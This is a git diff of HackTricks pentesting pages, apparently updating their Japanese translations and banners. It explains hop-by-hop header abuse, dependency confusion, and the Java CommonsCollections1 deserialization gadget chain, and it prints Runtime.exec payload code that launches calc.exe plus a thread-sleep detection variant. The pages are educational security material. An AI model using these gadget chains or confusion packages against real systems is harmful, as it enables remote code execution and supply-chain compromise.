+Support HackTricks
-* **サイバーセキュリティ企業で働いていますか?** **HackTricks で会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけます
-* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com) を手に入れます
-* **[💬](https://emojipedia.org/speech-balloon/) Discord グループ**に参加するか、[**telegram グループ**](https://t.me/peass) に参加するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live) をフォローしてください。
-* **ハッキングトリックを共有するには、[hacktricks リポジトリ](https://github.com/carlospolop/hacktricks) と [hacktricks-cloud リポジトリ](https://github.com/carlospolop/hacktricks-cloud) に PR を提出してください。**
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
diff --git a/pentesting-web/abusing-hop-by-hop-headers.md b/pentesting-web/abusing-hop-by-hop-headers.md
index 258c58cd7..f122c16c0 100644
--- a/pentesting-web/abusing-hop-by-hop-headers.md
+++ b/pentesting-web/abusing-hop-by-hop-headers.md
@@ -1,54 +1,60 @@
-# ホップバイホップヘッダー
+# hop-by-hop headers
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ !
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**してみたいですか?または**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**私をフォロー**する🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
-**この記事は[https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers](https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers)の要約です**
+**これは投稿の要約です [https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers](https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers)**
-ホップバイホップヘッダーは、単一のトランスポートレベル接続に固有であり、主にHTTP/1.1で使用され、2つのノード間のデータを管理するために使用されます(クライアント-プロキシまたはプロキシ-プロキシなど)、転送されることを意図していません。標準のホップバイホップヘッダーには、`Keep-Alive`、`Transfer-Encoding`、`TE`、`Connection`、`Trailer`、`Upgrade`、`Proxy-Authorization`、`Proxy-Authenticate`が含まれます。これらは[RFC 2616](https://tools.ietf.org/html/rfc2616#section-13.5.1)で定義されています。追加のヘッダーは、`Connection`ヘッダーを介してホップバイホップとして指定できます。
+Hop-by-hopヘッダーは、単一のトランスポートレベル接続に特有で、主にHTTP/1.1で2つのノード(クライアント-プロキシやプロキシ-プロキシ)間のデータを管理するために使用され、転送されることを意図していません。標準のhop-by-hopヘッダーには、`Keep-Alive`、`Transfer-Encoding`、`TE`、`Connection`、`Trailer`、`Upgrade`、`Proxy-Authorization`、および`Proxy-Authenticate`が含まれ、[RFC 2616](https://tools.ietf.org/html/rfc2616#section-13.5.1)で定義されています。追加のヘッダーは、`Connection`ヘッダーを介してhop-by-hopとして指定できます。
-### ホップバイホップヘッダーの悪用
-プロキシによるホップバイホップヘッダーの適切な管理がされていないと、セキュリティの問題が発生する可能性があります。これらのヘッダーを削除することが期待されているプロキシでも、すべてが削除されるわけではなく、潜在的な脆弱性が生じる可能性があります。
+### Hop-by-Hopヘッダーの悪用
+プロキシによるhop-by-hopヘッダーの不適切な管理は、セキュリティ上の問題を引き起こす可能性があります。プロキシはこれらのヘッダーを削除することが期待されていますが、すべてのプロキシがそうするわけではなく、潜在的な脆弱性を生み出します。
-### ホップバイホップヘッダーの処理のテスト
-ホップバイホップヘッダーの処理は、特定のヘッダーがホップバイホップとしてマークされたときにサーバー応答に変化が見られることでテストできます。ツールやスクリプトを使用してこのプロセスを自動化し、プロキシがこれらのヘッダーをどのように処理するかを特定し、ミス構成やプロキシの動作を明らかにすることができます。
+### Hop-by-Hopヘッダー処理のテスト
+特定のヘッダーがhop-by-hopとしてマークされているときのサーバーの応答の変化を観察することで、hop-by-hopヘッダーの処理をテストできます。ツールやスクリプトを使用してこのプロセスを自動化し、プロキシがこれらのヘッダーをどのように管理しているかを特定し、誤設定やプロキシの動作を明らかにすることができます。
-ホップバイホップヘッダーの悪用はさまざまなセキュリティ上の影響をもたらす可能性があります。以下に、これらのヘッダーを悪用して潜在的な攻撃を行う方法を示す例がいくつかあります:
+Hop-by-hopヘッダーの悪用は、さまざまなセキュリティ上の影響を引き起こす可能性があります。以下は、これらのヘッダーが潜在的な攻撃のためにどのように操作されるかを示すいくつかの例です。
-### `X-Forwarded-For`を使用したセキュリティコントロールのバイパス
-攻撃者は、`X-Forwarded-For`ヘッダーを操作してIPベースのアクセス制御をバイパスすることができます。このヘッダーは、プロキシがクライアントの元のIPアドレスを追跡するためによく使用されます。ただし、プロキシがこのヘッダーをホップバイホップとして扱い、適切な検証なしに転送する場合、攻撃者は自分のIPアドレスを偽装することができます。
+### `X-Forwarded-For`を使用したセキュリティ制御の回避
+攻撃者は、`X-Forwarded-For`ヘッダーを操作してIPベースのアクセス制御を回避できます。このヘッダーは、プロキシがクライアントの発信IPアドレスを追跡するために使用されることがよくあります。しかし、プロキシがこのヘッダーをhop-by-hopとして扱い、適切な検証なしに転送する場合、攻撃者は自分のIPアドレスを偽装できます。
-**攻撃シナリオ:**
-1. 攻撃者は、`X-Forwarded-For`ヘッダーに偽のIPアドレスを含めて、プロキシの背後にあるWebアプリケーションにHTTPリクエストを送信します。
-2. 攻撃者は、`Connection: close, X-Forwarded-For`ヘッダーも含め、プロキシに`X-Forwarded-For`をホップバイホップとして扱うよう促します。
-3. 設定が誤っているプロキシは、スプーフィングされた`X-Forwarded-For`ヘッダーを削除せずにWebアプリケーションにリクエストを転送します。
-4. 元の`X-Forwarded-For`ヘッダーが見えないWebアプリケーションは、リクエストを信頼されたプロキシから直接受信していると見なし、不正なアクセスを許可する可能性があります。
+**攻撃シナリオ:**
+1. 攻撃者は、プロキシの背後にあるWebアプリケーションにHTTPリクエストを送信し、`X-Forwarded-For`ヘッダーに偽のIPアドレスを含めます。
+2. 攻撃者は、`Connection: close, X-Forwarded-For`ヘッダーも含め、プロキシに`X-Forwarded-For`をhop-by-hopとして扱うよう促します。
+3. 誤設定されたプロキシは、偽装された`X-Forwarded-For`ヘッダーなしでリクエストをWebアプリケーションに転送します。
+4. Webアプリケーションは、元の`X-Forwarded-For`ヘッダーを見ていないため、リクエストが信頼されたプロキシから直接来たものと見なす可能性があり、無許可のアクセスを許可する可能性があります。
-### ホップバイホップヘッダーインジェクションによるキャッシュの汚染
-キャッシュサーバーがホップバイホップヘッダーに基づいてコンテンツを誤ってキャッシュする場合、攻撃者は悪意のあるヘッダーをインジェクトしてキャッシュを汚染することができます。これにより、同じリソースを要求するユーザーに誤ったまたは悪意のあるコンテンツが提供されます。
+### Hop-by-Hopヘッダー注入によるキャッシュポイズニング
+キャッシュサーバーがhop-by-hopヘッダーに基づいてコンテンツを誤ってキャッシュする場合、攻撃者は悪意のあるヘッダーを注入してキャッシュを汚染する可能性があります。これにより、同じリソースを要求するユーザーに不正確または悪意のあるコンテンツが提供されます。
-**攻撃シナリオ:**
-1. 攻撃者は、キャッシュされてはならないホップバイホップヘッダーを持つリクエストをWebアプリケーションに送信します(例:`Connection: close, Cookie`)。
-2. 設定が不十分なキャッシュサーバーは、ホップバイホップヘッダーを削除せずに、攻撃者のセッションに特化したレスポンスをキャッシュします。
-3. 同じリソースを要求する将来のユーザーは、攻撃者向けに調整されたキャッシュされたレスポンスを受け取り、セッションハイジャックや機密情報の公開につながる可能性があります。
+**攻撃シナリオ:**
+1. 攻撃者は、キャッシュされるべきでないhop-by-hopヘッダー(例:`Connection: close, Cookie`)を含むリクエストをWebアプリケーションに送信します。
+2. 不適切に構成されたキャッシュサーバーは、hop-by-hopヘッダーを削除せず、攻撃者のセッションに特化した応答をキャッシュします。
+3. 同じリソースを要求する将来のユーザーは、攻撃者向けに調整されたキャッシュされた応答を受け取り、セッションハイジャックや機密情報の露出につながる可能性があります。
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ !
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**してみたいですか?または**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**私をフォロー**する🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
diff --git a/pentesting-web/dependency-confusion.md b/pentesting-web/dependency-confusion.md
index e9aac1f45..c54e1aed5 100644
--- a/pentesting-web/dependency-confusion.md
+++ b/pentesting-web/dependency-confusion.md
@@ -1,54 +1,58 @@
# 依存関係の混乱
+{% hint style="success" %}
+AWSハッキングを学び、実践する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-htARTE(HackTricks AWS Red Team Expert) を通じてゼロからヒーローまでAWSハッキングを学ぶ!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**してみたいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有する**には、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
+{% endhint %}
{% embed url="https://websec.nl/" %}
+
## 基本情報
-要約すると、依存関係の混乱の脆弱性は、プロジェクトが**スペルミス**、**存在しない**ライブラリ、または**指定されていないバージョン**を使用しており、使用されている依存関係リポジトリが**公開リポジトリから更新されたバージョンを収集することを許可**しているときに発生します。
+要約すると、依存関係の混乱脆弱性は、プロジェクトが**スペルミス**のある名前、**存在しない**、または**バージョンが指定されていない**ライブラリを使用しているときに発生し、使用される依存関係リポジトリが**公開**リポジトリから**更新されたバージョンを取得する**ことを許可します。
-* **スペルミス**: `requests`の代わりに**`reqests`**をインポート
-* **存在しない**: 存在しない内部ライブラリである`company-logging`をインポート
-* **指定されていないバージョン**: **内部**の**存在する**`company-requests`ライブラリをインポートしますが、リポジトリは**公開リポジトリ**をチェックして、**より大きなバージョン**があるかどうかを確認します。
+* **スペルミス**:`requests`の代わりに**`reqests`**をインポート
+* **存在しない**:**もはや存在しない**内部ライブラリ`company-logging`をインポート
+* **バージョンが指定されていない**:**内部**の**存在する**`company-requests`ライブラリをインポートするが、リポジトリは**より新しいバージョン**があるかどうかを**公開リポジトリ**で確認する。
## 悪用
{% hint style="warning" %}
-すべての場合において、攻撃者は単に被害企業が使用しているライブラリの名前を持つ**悪意のあるパッケージを公開する必要があります**。
+すべての場合において、攻撃者は被害者企業が使用しているライブラリの**名前を持つ悪意のあるパッケージを公開する**だけで済みます。
{% endhint %}
-### スペルミス&存在しない
+### スペルミスと存在しない
-企業が**内部ではないライブラリをインポートしようとしている**場合、ライブラリのリポジトリは**おそらく公開リポジトリ**でそれを検索しようとします。攻撃者がそれを作成している場合、あなたのコードと実行中のマシンはおそらく**侵害される可能性が高い**です。
+あなたの会社が**内部でないライブラリをインポートしようとしている**場合、ライブラリのリポジトリは**公開リポジトリ**でそれを探す可能性が非常に高いです。攻撃者がそれを作成している場合、あなたのコードと実行中のマシンは非常に高い確率で侵害されるでしょう。
-### 指定されていないバージョン
+### バージョンが指定されていない
-開発者がライブラリのバージョンを**指定しない**か、**メジャーバージョン**のみを指定することは非常に一般的です。その後、インタプリタは、これらの要件に一致する**最新バージョン**をダウンロードしようとします。\
-ライブラリが**既知の外部ライブラリ**(例:python `requests`)である場合、**攻撃者はあまりできません**。なぜなら、`requests`というライブラリを作成することはできないからです(元の著者でない限り)。\
-ただし、この例のように、`requests-company`のような**内部**のライブラリの場合、**ライブラリリポジトリ**が**外部からも新しいバージョンを確認できる**場合、公開で利用可能な新しいバージョンを検索します。\
-したがって、**攻撃者が**企業が`requests-company`ライブラリ**バージョン1.0.1**を使用していることを知っている場合(マイナーアップデートを許可)、`requests-company`**バージョン1.0.2**を公開することができ、企業は**内部のものの代わりにそのライブラリを使用**することになります。
+開発者が使用するライブラリの**バージョンを指定しない**、または**メジャーバージョン**だけを指定することは非常に一般的です。その後、インタープリターはその要件に合った**最新バージョン**をダウンロードしようとします。\
+ライブラリが**既知の外部ライブラリ**(例えば、Pythonの`requests`)である場合、**攻撃者はあまりできることがありません**。なぜなら、彼は`requests`という名前のライブラリを作成できないからです(彼が元の著者でない限り)。\
+しかし、ライブラリが**内部**である場合、例えばこの例の`requests-company`のように、**ライブラリリポジトリ**が**外部からの新しいバージョンの確認を許可する**場合、公開されている新しいバージョンを探します。\
+したがって、**攻撃者が**会社が`requests-company`ライブラリの**バージョン1.0.1**(マイナーアップデートを許可)を使用していることを知っている場合、彼は**バージョン1.0.2**のライブラリ`requests-company`を**公開**し、会社は内部のものの代わりに**そのライブラリを使用する**ことになります。
## AWSの修正
-この脆弱性はAWSの**CodeArtifact**で見つかりました(このブログポストの[**詳細を読む**](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d))。\
-AWSは、内部依存関係を外部リポジトリからダウンロードすることを避けるために、ライブラリが内部か外部かを指定できるように修正しました。
+この脆弱性はAWSの**CodeArtifact**で発見されました([**このブログ投稿の詳細を読む**](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d))。\
+AWSは、ライブラリが内部か外部かを指定できるようにすることで、外部リポジトリから内部依存関係をダウンロードするのを避けるように修正しました。
-## 脆弱なライブラリの検出
+## 脆弱なライブラリの発見
-[**依存関係の混乱に関する元の投稿**](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)では、著者が、JavaScriptプロジェクトの依存関係を含む数千の公開されたpackage.jsonファイルを検索しました。
+[**依存関係の混乱に関する元の投稿**](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)で、著者はJavaScriptプロジェクトの依存関係を含む数千の公開されたpackage.jsonファイルを検索しました。
## 参考文献
@@ -59,14 +63,17 @@ AWSは、内部依存関係を外部リポジトリからダウンロードす
{% embed url="https://websec.nl/" %}
+{% hint style="success" %}
+AWSハッキングを学び、実践する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-htARTE(HackTricks AWS Red Team Expert) を通じてゼロからヒーローまでAWSハッキングを学ぶ!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**してみたいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有する**には、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
+{% endhint %}
diff --git a/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md b/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
index 79dc29286..68c003ab9 100644
--- a/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
+++ b/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
@@ -1,20 +1,23 @@
-# CommonsCollection1 ペイロード - Java Transformersを使用したRutime exec()およびThread Sleep
+# CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-htARTE(HackTricks AWS Red Team Expert) でゼロからヒーローまでAWSハッキングを学ぶ!
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
-* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れましょう
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
-* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)および[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
-## Java Transformersを使用したRutime exec()
+## Java Transformers to Rutime exec()
-いくつかの場所で、次のようなApache common collectionsからのtransformersを使用するjava逆シリアル化ペイロードが見つかります:
+いくつかの場所で、次のようなApacheコモンコレクションのトランスフォーマーを使用したJavaデシリアライズペイロードを見つけることができます:
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
@@ -52,22 +55,22 @@ lazyMap.get("anything");
}
}
```
-もしJavaの逆シリアル化ペイロードについて何も知らない場合、なぜこのコードがcalcを実行するのかを理解するのは難しいかもしれません。
+Javaのデシリアライズペイロードについて何も知らない場合、このコードがどのようにcalcを実行するかを理解するのは難しいかもしれません。
-まず最初に知っておくべきことは、**JavaのTransformer**は**クラスを受け取り**、**異なるクラスに変換する**ものです。\
-また、ここで**実行されているペイロード**が**等価**であることを知ることも興味深いです。
+まず第一に、**JavaのTransformer**は、**クラスを受け取り**、**別のクラスに変換する**ものであることを知っておく必要があります。\
+また、ここで**実行されているペイロード**は**次のものと同等**であることを知っておくと興味深いです:
```java
Runtime.getRuntime().exec(new String[]{"calc.exe"});
```
-または、**より正確には**、最終的に実行される内容は次のとおりです:
+または**正確に言うと**、最後に実行されるのは次のものです:
```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```
-### 方法
+### どのように
-では、最初のペイロードがどのようにして「シンプルな」ワンライナーと同等であるかを見てみましょう。
+では、最初のペイロードが「シンプル」なワンライナーと同等である理由は何ですか?
-まず、ペイロードの中で**変換のチェーン(配列)が作成**されていることに気づくことができます。
+**まず**、ペイロードには**変換のチェーン(配列)が作成されている**ことに気づくことができます:
```java
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
@@ -94,15 +97,15 @@ command
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
```
-コードを読むと、配列の変換を何らかの方法で連鎖させると、任意のコマンドを実行できる可能性があります。
+コードを読むと、配列の変換を何らかの方法で連鎖させることができれば、任意のコマンドを実行できることに気付くでしょう。
-したがって、**これらの変換はどのように連鎖されるのですか?**
+では、**それらの変換はどのように連鎖するのですか?**
```java
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("anything");
```
-最後のペイロードのセクションでは、**Mapオブジェクトが作成されています**。その後、`LazyMap`から`decorate`関数が実行され、マップオブジェクトとチェーンされたトランスフォーマーが渡されます。次のコードからわかるように、これにより**チェーンされたトランスフォーマー**が`lazyMap.factory`属性の中にコピーされることになります:
+ペイロードの最後のセクションでは、**Mapオブジェクトが作成されます**。次に、`LazyMap`からマップオブジェクトとチェーンされたトランスフォーマーを使って関数`decorate`が実行されます。以下のコードから、これにより**チェーンされたトランスフォーマー**が`lazyMap.factory`属性内にコピーされることがわかります:
```java
protected LazyMap(Map map, Transformer factory) {
super(map);
@@ -112,9 +115,9 @@ throw new IllegalArgumentException("Factory must not be null");
this.factory = factory;
}
```
-そして、壮大なフィナーレが実行されます:`lazyMap.get("anything");`
+そして、素晴らしいフィナーレが実行されます: `lazyMap.get("anything");`
-これが`get`関数のコードです:
+これは `get` 関数のコードです:
```java
public Object get(Object key) {
if (map.containsKey(key) == false) {
@@ -125,7 +128,7 @@ return value;
return map.get(key);
}
```
-そして、これが`transform`関数のコードです。
+そして、これは `transform` 関数のコードです。
```java
public Object transform(Object object) {
for (int i = 0; i < iTransformers.length; i++) {
@@ -134,11 +137,11 @@ object = iTransformers[i].transform(object);
return object;
}
```
-したがって、**factory** の内部には **`chainedTransformer`** が保存されており、**`transform`** 関数の内部では、**それらのチェーンされたtransformerをすべて通過**し、1つずつ実行しています。面白いことに、**各transformerは入力として`object`** を使用しており、**objectは前に実行されたtransformerの出力**です。したがって、**すべての変換は悪意のあるペイロードを実行するようにチェーンされています**。
+だから、**factory**の中に**`chainedTransformer`**を保存しており、**`transform`**関数の中で**すべてのチェーンされたトランスフォーマーを通過して**、1つずつ実行しています。面白いことに、**各トランスフォーマーは`object`**を**入力**として使用し、**objectは最後に実行されたトランスフォーマーからの出力**です。したがって、**すべてのトランスフォームは悪意のあるペイロードをチェーン実行しています**。
-### 要約
+### 概要
-最終的には、lazyMapがgetメソッド内でチェーンされたtransformerをどのように管理しているかによって、次のコードを実行しているかのようです。
+最終的に、lazyMapがgetメソッド内でチェーンされたトランスフォーマーを管理する方法のため、私たちが以下のコードを実行しているかのようです:
```java
Object value = "someting";
@@ -159,15 +162,15 @@ new Class[]{String.class},
command
).transform(value); //(4)
```
-_注意してください。`value` は各変換の入力であり、前の変換の出力であり、ワンライナーの実行を可能にしています:_
+_Note how `value` は各 transform の入力であり、前の transform の出力であり、ワンライナーの実行を可能にします:_
```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```
-ここでは、**ComonsCollections1** ペイロードに使用されるガジェットが説明されていました。しかし、**これがどのように実行を開始するかは残されています**。[ここで **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java) を見ると、このペイロードを実行するために、`AnnotationInvocationHandler` オブジェクトが使用されていることがわかります。なぜなら、**このオブジェクトが逆シリアル化されると**、`payload.get()` 関数が呼び出され、**ペイロード全体が実行される**でしょう。
+注意してください、ここでは**ComonsCollections1**ペイロードに使用される**ガジェット**が説明されました。しかし、**これがどのように実行されるか**は残されています。 [ここで**ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java)を確認できます。このペイロードを実行するために、`AnnotationInvocationHandler`オブジェクトを使用します。なぜなら、**このオブジェクトがデシリアライズされると**、`payload.get()`関数を**呼び出す**からです。これにより、**ペイロード全体が実行されます**。
-## Java Thread Sleep
+## Javaスレッドスリープ
-このペイロードは、**Web が脆弱かどうかを特定するのに便利**であり、脆弱である場合はスリープを実行します。
+このペイロードは、**ウェブが脆弱かどうかを特定するのに便利です。脆弱であればスリープを実行します**。
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
@@ -210,20 +213,23 @@ lazyMap.get("anything");
}
}
```
-## もっとガジェット
+## More Gadgets
-こちらでさらにガジェットを見つけることができます: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
+ここでさらにガジェットを見つけることができます: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
##
+{% hint style="success" %}
+AWSハッキングを学び、練習する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、練習する: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
